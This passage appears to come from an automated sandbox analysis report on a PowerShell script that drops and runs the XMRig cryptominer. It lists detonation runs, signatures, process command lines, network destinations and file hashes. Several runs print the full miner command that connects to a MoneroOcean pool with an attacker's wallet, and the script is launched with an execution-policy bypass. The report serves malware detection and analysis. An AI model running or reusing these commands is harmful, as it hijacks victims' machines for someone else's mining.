US 8.8.8.8:53 6.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/3152-3-0x00007FFC012B3000-0x00007FFC012B4000-memory.dmp

memory/3152-5-0x0000011D3BEB0000-0x0000011D3BED2000-memory.dmp

memory/3152-7-0x00007FFC012B0000-0x00007FFC01C9C000-memory.dmp

memory/3152-9-0x0000011D3C060000-0x0000011D3C0D6000-memory.dmp

memory/3152-10-0x00007FFC012B0000-0x00007FFC01C9C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xymowxz0.cfe.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3152-26-0x00007FFC012B0000-0x00007FFC01C9C000-memory.dmp

memory/3152-49-0x0000011D3C0E0000-0x0000011D3C0F2000-memory.dmp

memory/3152-62-0x0000011D3C040000-0x0000011D3C04A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4316-91-0x000002A746F30000-0x000002A746F50000-memory.dmp

memory/4316-92-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-93-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/3152-94-0x00007FFC012B0000-0x00007FFC01C9C000-memory.dmp

memory/3152-95-0x00007FFC012B3000-0x00007FFC012B4000-memory.dmp

memory/3152-96-0x00007FFC012B0000-0x00007FFC01C9C000-memory.dmp

memory/4316-97-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-98-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-99-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-100-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-101-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-102-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-103-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-104-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-105-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-106-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-107-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-108-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-109-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-110-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-111-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-112-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-113-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-114-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-115-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-116-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-117-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-118-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-119-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-120-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-121-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-122-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-123-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-124-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-125-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-126-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-127-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-128-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-129-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-130-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-131-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-132-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-133-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-134-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-135-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-136-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-137-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-138-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-139-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-140-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-141-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-142-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-143-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-144-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-145-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-146-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-147-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-148-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-149-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-150-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-151-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-152-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-153-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-154-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-155-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-156-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

memory/4316-157-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:50

Platform

win11-20240508-en

Max time kernel

1766s

Max time network

1775s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

memory/1056-0-0x00007FFF4A593000-0x00007FFF4A595000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_he5huove.y1p.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1056-9-0x0000026960040000-0x0000026960062000-memory.dmp

memory/1056-10-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp

memory/1056-11-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp

memory/1056-12-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp

memory/1056-13-0x00007FFF4A593000-0x00007FFF4A595000-memory.dmp

memory/1056-14-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:29

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 137.71.105.51.in-addr.arpa udp

Files

memory/4716-0-0x00007FFA49D23000-0x00007FFA49D25000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l2ua1ydw.wyj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4716-10-0x0000021B7F4C0000-0x0000021B7F4E2000-memory.dmp

memory/4716-11-0x00007FFA49D20000-0x00007FFA4A7E1000-memory.dmp

memory/4716-12-0x00007FFA49D20000-0x00007FFA4A7E1000-memory.dmp

memory/4716-14-0x00007FFA49D20000-0x00007FFA4A7E1000-memory.dmp

memory/4716-15-0x0000021B7F490000-0x0000021B7F4A2000-memory.dmp

memory/4716-16-0x0000021B7DC50000-0x0000021B7DC5A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:30

Platform

win11-20240508-en

Max time kernel

1712s

Max time network

1722s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 52.111.227.11:443 tcp

Files

memory/4836-0-0x00007FFB2CC93000-0x00007FFB2CC95000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ilqk5kpr.jbl.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Analysis: behavioral17

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:41

Platform

win7-20240221-en

Max time kernel

1562s

Max time network

1568s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Network

N/A

Files

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:29

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 24.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uevzqsoh.brm.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:37

Platform

win11-20240426-en

Max time kernel

1798s

Max time network

1785s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp

Files

memory/5040-0-0x00007FFFE77F3000-0x00007FFFE77F5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_urs2oi5d.dqc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral24

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:44

Platform

win11-20240508-en

Max time kernel

1651s

Max time network

1660s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

memory/2492-0-0x00007FFC1B913000-0x00007FFC1B915000-memory.dmp

memory/2492-9-0x000001B1AA220000-0x000001B1AA242000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zsgnixku.waa.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Analysis: behavioral31

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:49

Platform

win10v2004-20240226-en

Max time kernel

1794s

Max time network

1803s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

